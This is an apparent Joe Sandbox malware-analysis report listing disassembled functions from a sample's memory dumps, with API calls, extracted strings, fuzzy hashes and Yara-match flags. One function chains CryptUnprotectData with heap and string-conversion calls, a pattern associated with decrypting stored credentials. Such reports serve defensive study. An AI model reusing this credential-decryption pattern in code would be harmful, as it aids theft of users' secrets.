?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C6A2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C6A2C61

Part of subcall function 6C654DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C654E5A
Part of subcall function 6C654DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C654E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6A2E2D

Part of subcall function 6C6681B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6681DE

Strings

(root), xrefs: 6C6A354F
expected a Time entry, xrefs: 6C6A2E36
ProfileBuffer parse error: %s, xrefs: 6C6A2E3B

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 02e4312583ca8ec7a0c251b38ac92e337338f3bd8d8f9d95d7f3126bcdc41898
Instruction ID: c45b159c50666698707fa0529ec4367b72d96f9d0c3f7e5a65ee094248517380
Opcode Fuzzy Hash: 02e4312583ca8ec7a0c251b38ac92e337338f3bd8d8f9d95d7f3126bcdc41898
Instruction Fuzzy Hash: 4191CF706087408FC724DF65C48469EF7E1AFCA358F10492DE99A8B751DB30E94ACB5B

Function 00CE26CF Relevance: 11.6, Strings: 8, Instructions: 1625COMMON

Download Yara Rule

Strings

H|w, xrefs: 00CE38F7
!zO`, xrefs: 00CE3691
QYmy, xrefs: 00CE378E
aawO, xrefs: 00CE2C3E
'^, xrefs: 00CE2CAE
FLwt, xrefs: 00CE3385
.u]>, xrefs: 00CE2D04
'\W\, xrefs: 00CE2D16

Memory Dump Source

Source File: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !zO`$'\W\$'^$.u]>$FLwt$H|w$QYmy$aawO
API String ID: 0-3780651510
Opcode ID: 468a3e41a4bc357816365dcde255701f176b8ac8e8e0af2295cbe4d11753e70d
Instruction ID: a2184b6b4d6ed552b2c122ebd01daa313208000a89005645910700b262f3f2cf
Opcode Fuzzy Hash: 468a3e41a4bc357816365dcde255701f176b8ac8e8e0af2295cbe4d11753e70d
Instruction Fuzzy Hash: E3B2F2F3A0C6009FE3046E2DEC8577ABBE9EF94720F1A493DE6C587744EA3558018697

Function 6C65D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

8, xrefs: 6C65DC08
, xrefs: 6C65DA88
0, xrefs: 6C65DC7F
0, xrefs: 6C65D852
-, xrefs: 6C65D7DD
1, xrefs: 6C65DBDD
@, xrefs: 6C65DAF6
9, xrefs: 6C65DE7F

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: f7c7fb8722b8d40fa9d8c16e59a2d3bee432b4aa4bab75384451ff90da6f604b
Instruction ID: 0aa39ac45e123d66a3a14887cae5e2a87215a2a65c9adc49dc6c57d26949dd6f
Opcode Fuzzy Hash: f7c7fb8722b8d40fa9d8c16e59a2d3bee432b4aa4bab75384451ff90da6f604b
Instruction Fuzzy Hash: A262CF7060C3458FD701CF19C69079ABBF2AF86358FB84A0DE4D54BAD1C33599A5CB8A

Function 00CE5BCF Relevance: 10.4, Strings: 7, Instructions: 1633COMMON

Download Yara Rule

Strings

19mz, xrefs: 00CE6F47
dzw, xrefs: 00CE60A3
nv1, xrefs: 00CE62CE
m,a?, xrefs: 00CE6D12
=X{o, xrefs: 00CE5D24
\5:G, xrefs: 00CE6BDB
U+l, xrefs: 00CE69B1

Memory Dump Source

Source File: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 19mz$=X{o$U+l$\5:G$dzw$m,a?$nv1
API String ID: 0-3546804064
Opcode ID: 10488abd0691ce7c3a529bc6f96471be0e304c6771d63d8cb065d4921f533772
Instruction ID: 09d44b0f2eb1295318dab138d61dad6019e810062338b3391b7284f0e3868e4b
Opcode Fuzzy Hash: 10488abd0691ce7c3a529bc6f96471be0e304c6771d63d8cb065d4921f533772
Instruction Fuzzy Hash: 01B258F3A0C2049FE3046E2DEC8567AFBE5EF94760F1A4A3DEAC487744E93558058687

Function 6C6C545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6C8A4B

Strings

~qel, xrefs: 6C6C5703, 6C6C9269, 6C6C5740, 6C6C921F, 6C6C9459, 6C6C56C7, 6C6C948F

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset
String ID: ~qel
API String ID: 2221118986-2736371781
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 01af520261224d43aa745bc0de72f0653f0550fdd9b9ffcc5ee0159283b6d2d5
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 0BB1F772F0021A8FDB24CF68CC907E9B7B2EF85318F1802AAC549DB791D7349985CB95

Function 6C6C542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6C88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6C925C

Strings

~qel, xrefs: 6C6C5703, 6C6C9269, 6C6C5740, 6C6C921F, 6C6C9459, 6C6C56C7, 6C6C948F

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset
String ID: ~qel
API String ID: 2221118986-2736371781
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 847e3582a78b901618d98ce7101b713317aa8019d6372db2b3185b55660006ee
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: ABB1E572F0420A8BCB14CE58CC816EDB7B2EF85314F14426AC949DB795D734A989CB95

Function 00CE92E0 Relevance: 7.8, Strings: 5, Instructions: 1567COMMON

Download Yara Rule

Strings

vw7, xrefs: 00CE9EF6
W(}, xrefs: 00CE9343
{u'6, xrefs: 00CEA285
m"R, xrefs: 00CE9A68
TRo, xrefs: 00CEA58F

Memory Dump Source

Source File: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID:
String ID: TRo$W(}$m"R${u'6$vw7
API String ID: 0-3682664666
Opcode ID: 973e55c647b0c31fb2b6b27c3ed15816303dc0da1e76c0a9566d112abc447bbd
Instruction ID: 58a21eee5fb803170b1e69afc8b5c9740e810625bc8ba0adb0d13a70a6fd3978
Opcode Fuzzy Hash: 973e55c647b0c31fb2b6b27c3ed15816303dc0da1e76c0a9566d112abc447bbd
Instruction Fuzzy Hash: D5B2F3F3A0C210AFE3046F29EC8566AFBE5EF94720F1A492DEAC4D3340E67558458797

Function 00CEAD5E Relevance: 7.8, Strings: 5, Instructions: 1525COMMON

Download Yara Rule

Strings

aD^{, xrefs: 00CEAF7F
Z/mk, xrefs: 00CEB8EB
-k?, xrefs: 00CEAE29
?,X=, xrefs: 00CEAE35
W8B, xrefs: 00CEBCFD

Memory Dump Source

Source File: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ?,X=$W8B$Z/mk$aD^{$-k?
API String ID: 0-674176254
Opcode ID: 6211c44de218eb45a3819f4f998307d5ea8099dbee539614645f92e5046722e7
Instruction ID: 58a7ca5ee63e0dd6665daa5542a29f815460e409b74f1a9adb0e84650d34363d
Opcode Fuzzy Hash: 6211c44de218eb45a3819f4f998307d5ea8099dbee539614645f92e5046722e7
Instruction Fuzzy Hash: B4A2E2F390C604AFE3047E29EC8567AFBE5EF94720F1A493DEAC583744EA3558148687

Function 00CEFE47 Relevance: 7.7, Strings: 5, Instructions: 1485COMMON

Download Yara Rule

Strings

r?, xrefs: 00CF105C
:/, xrefs: 00CF0432
Lqz/, xrefs: 00CF0E43
k:, xrefs: 00CF03AD
qqwu, xrefs: 00CF0FDC

Memory Dump Source

Source File: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID:
String ID: k:$:/$Lqz/$qqwu$r?
API String ID: 0-3927496373
Opcode ID: a32ad2dcc90e5b85c3ee6b076cfca6d9a632fbcb3f327b5e42fb0a6bd7763029
Instruction ID: 9bd07658b1c153a0177f953bdbee48fe55d3039ccf4a3313dad152ed83fa901c
Opcode Fuzzy Hash: a32ad2dcc90e5b85c3ee6b076cfca6d9a632fbcb3f327b5e42fb0a6bd7763029
Instruction Fuzzy Hash: 4FA2F4F36082049FE304AF2DEC8567ABBE5EF94220F1A493DEAC4C7344E67598458786

Function 00927240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0092724D
RtlAllocateHeap.NTDLL(00000000), ref: 00927254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00927281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009272A4
LocalFree.KERNEL32(?), ref: 009272AE

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: c3ce5e13dbd9c4fc09936991601a3094dc3c465b1d71001aaca5cc44e32a1ba1
Instruction ID: 3cc454083f55dbe8d7fddb08246807f7b6c6e840f0646f9085a3aa1aed3bab2c
